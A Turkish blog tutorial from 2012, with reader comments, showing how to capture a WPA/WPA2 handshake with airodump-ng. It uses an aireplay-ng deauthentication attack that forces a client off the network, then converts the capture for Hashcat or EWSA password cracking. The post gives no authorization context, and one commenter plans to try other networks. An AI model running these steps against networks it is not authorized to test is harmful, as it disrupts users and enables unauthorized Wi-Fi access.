Hürriyet

18 Kasım 2012 Pazar

Wpa/Wpa2 Handshake Yakalama Ve Diğer Programlara uyarlama

Merbaba Bu Bölümde Wpa/wpa2 De Handshake yakalamayı ve diğer programlara uyarlamayı(EWSA,Hashcat) Göstereceğim.

Önce Handshakeyi yakalamız gerekmekte Bunu elde etmek için Wpa yada Wpa2 Ağına Bağlı Bir Kullanıcı olması gerekli yani interneti kullanan birinin olması lazım yoksa elde edemeyiz.
Öncelikle aşağıdaki kodla etfarı dinlemeye başlıyoruz...
root@bt:~# .airmon-ng start wlan0
wlan0-->[Burası herkese göre değişir.Yeni bir konsol açarak "ifconfig" yazarak öğrenebilirsiniz.]
root@bt:~# .cd Desktop --> Dosyaların masaüstüne kayıt olması için
root@bt:~# .airodump-ng -w kayit mon0 




Üstteki resimdede Gördüğümüz gibi "infected" ağına bağlı 3 adet kullanıcı mevcut ve aralarında kare içinde olan ağda veri akışı var.Packets yazan kısımda 93 adet paket aktarımı olmuş.Bunu Deaulth yaparak ağdan düşüreceğiz ve yeniden bağlanırken Handshake Yi almış olacağız.
Şimdi Ağımızı Ve Düşüreceğimiz Clienti(kullanıcıyı) seçtikten sonra aşağıdaki komutla saldıracağız.
root@bt:~# .aireplay-ng -0 6 -a [Modemin Mac Adresi] -c [Clientin Mac Adresi] mon0
6 rakamını 0 yaparsanız kesintizi Deaulth işlemi gerçekleştirir.Bu rakamın fazla olması durumunda Wireless cevap vermeyebilir
[ 6|64 ACKs] yazan yer [ 0|00 ACKs] olması durumunda durdurup işlemi tekrarlayınız.



Bu işlem sırasında Ağı düşürdüyseniz Aşağıdaki resimdeki gibi modemin Mac Adresi yazar artık yakalma işlemi tamamlanmıştır. Elimizde kayit.cap isimli handshakeyi elde ettik. tabi bunun yanında 3 adet farklı dosyalarda oluştu onlar bizim için önemli değil.

Şimdi Bu Handshakeyi hashcat-GUI ye yada EWSA (Elcomsotf Wireless Security Auditor ) ün görebileceği şekilde dönüştirmeye kaldı.
Gördüğümüz gibi 4 adet dosya oluştu Bunları çevirme işlemine Geldi Ben resimde Hashcat için çevirmeyi gösterdim.


root@bt:~# .aircrack-ng kayit-01.cap -J hashcatdosya yazarak hashcat için dosyamız oluşur 
yada
root@bt:~# .aircrack-ng kayit-01.cap -E ewsadosya yazarsak ta ewsa için dosya oluşacaktır
artık bunları backtrackten windowsa çıkartarak kırabiliriz.
 
Resimdede Gördüğünüz gibi Gerekli dosyayı oluşturduk Dosyayı sürükleyerek windows dışına çıkartabilirsiniz(vmware için)

Artık kırma işlemi size kaldı kolay gelsin.



10 yorum:

  1. Emeğinize sağlık. Bu kadar hızlı olacağını ummuyordum. Hemen bu gece yazdıklarınızı uygulamaya çalışacağım.

    Ben de beini ile uğraşıyordum. handshake yakaladım ve şifre denemeye kadar ilerledim. wordlist olarak sizin 9 haneli olan dosyayı beini.iso içine atınca iso bozuluyor. Küçük dosyalarda sorun olmuyorda. Wordlisti windows masaüstünden, cd den veya usb den çağırma olanağı var mı acaba?

    YanıtlaSil
  2. Yazıda anlattıklarınızı birebir uyguladım. Son aşamaya kadar geldim. [ 0|00 ACKs] durumunu geçemedim. Defalarca denemek gerekiyor, ağın da iyi çekiyor olması lazım sanırım. Başka ağlarda deneyeceğim.
    BSSID değeri -not associated- olarak görünen ama STATION değerleri olan ağlar var. Onlar, onlar için bir şey mümkün mü?
    Teşekkür eder, iyi çalışmalar dilerim.

    YanıtlaSil
  3. Merhaba, sizin backtrack sürümünü öğrenebilir miyim? vmware kullanıyorum. toplanan paket bölümü bende çıkmıyor. Beini ile handshakeyi yakaladığım ağı backtrack ile yakalayamıyorum. Beinide handshake dosyaları nerede tutuluyor bir türlü bulamadım. Onları bulup dışarı çıkarmak istiyorum.
    Çalışmalarınızda başarılar dilerim.

    YanıtlaSil
  4. Beinide handshake dosyaları airodump yadığınızdaki konumuna bakın
    yani
    airodump-ng ...... vs yazdığınızda onun yerine ls yazın ve enterleyin .cap dosyalarınız görünecektir
    klasörden /root adresine bakmanız.
    (not associated) ise o wireless in bir modeme bağlı olduğu gösteriyor ancak hangi modem olduğunu belli değil çünkü sizin wireless iniz o vireless in bağlı olduğu modemi çekmiyor.
    Size kısa zamanda daha net bilgi vericeğim.

    YanıtlaSil
  5. XFE yazan yere tıklayın ardından home yazan yere girin yakaladğıınız dosyalar orda olmalı dosyaları çıkartmak için vmware toolsu kurmalısınız. veya USb ile çıkartabilirsiniz.

    YanıtlaSil
  6. Merhaba, bugün backtrak sitesinden vmware backtrack rc3 dosyasını indirdim. iso olanı ile sanal makinede çalışabiliyorum. vm backtrak olanı denemek istemiştim. vm dosyayı çalştırırken hata veriyor. vm nin doğru sürümü nedir acaba? Bendeki 7 sürümü. iso çalıştırmakla virtual makineye uyumlu olanı arasında bir fark var mı burada?
    Teşekkür ederim.

    YanıtlaSil
  7. Ben vmware 9 kullanıyorum ve İnternetten indirilien Hazır vmware kalıbını önermiyorum .iso olarak indirip kurmanızı tavsiye ederim!

    YanıtlaSil
  8. Bunların Hepsi Backtrack Te kurulu

    YanıtlaSil
  9. aireplay-ng --deauth 10 -a -c wlan0 veya wlanmon0 veya wlan0mon olarak olana kadar dene senin ağ kartına göre birisi calıscaktır ..

    YanıtlaSil